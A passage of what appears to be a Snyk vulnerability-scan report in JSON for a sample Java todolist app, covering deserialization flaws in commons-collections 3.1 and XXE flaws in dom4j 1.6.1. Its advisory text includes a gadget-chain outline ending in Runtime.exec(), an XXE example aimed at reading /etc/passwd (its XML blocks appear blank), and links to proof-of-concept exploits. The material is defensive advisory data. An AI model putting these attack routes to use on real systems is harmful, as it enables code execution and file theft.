zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", - "epssDetails": { - "percentile": "0.88407", - "probability": "0.01844", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-7501" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "transform" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:38.421377Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.2.2)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.6, - "functions": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/commons-collections/pull/18", - "title": "GitHub PR" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:34.698666Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", - "epssDetails": { - "percentile": "0.82603", - "probability": "0.00880", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-6420" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6hgm-866r-3cjv" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2019-10-10T18:31:03.943542Z", - "functions_new": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-10T00:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2020-02-24T00:00:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:35.761152Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - }, - { - "url": "https://www.exploit-db.com/exploits/46628", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.088365Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99663", - "probability": "0.96725", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-4852" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.946764Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.834525Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-DOM4J-174153", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "credit": [ - "Mario Areias" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/Namespace.java", - "className": "Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/QName.java", - "className": "QName", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/dom4j/dom4j/issues/48", - "title": "GitHub Issue" - }, - { - "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", - "title": "POC: Ihacktoprotect Blog" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:55.789489Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", - "epssDetails": { - "percentile": "0.70906", - "probability": "0.00325", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000632" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-6pcc-3rfx-4gpm" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2019-04-10T16:07:04.634619Z", - "functions_new": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.QName", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-01T19:12:29Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2018-08-21T14:16:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.900402Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-DOM4J-2812975", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/a822852", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:31.083245Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", - "epssDetails": { - "percentile": "0.79800", - "probability": "0.00664", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10683" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-hwj3-m3p6-hj38" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2022-05-10T12:56:27.582369Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-15T09:38:17Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2020-04-16T15:22:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.985080Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-JAVAXSERVLET-30449", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "credit": [ - "David Jorm" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "javax.servlet:jstl", - "references": [ - { - "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", - "title": "Apache Mail Archive" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", - "title": "NVD" - }, - { - "url": "https://access.redhat.com/security/cve/CVE-2015-0254", - "title": "RedHat CVE Database" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "cvssV3BaseScore": 7.6, - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:43.270072Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": 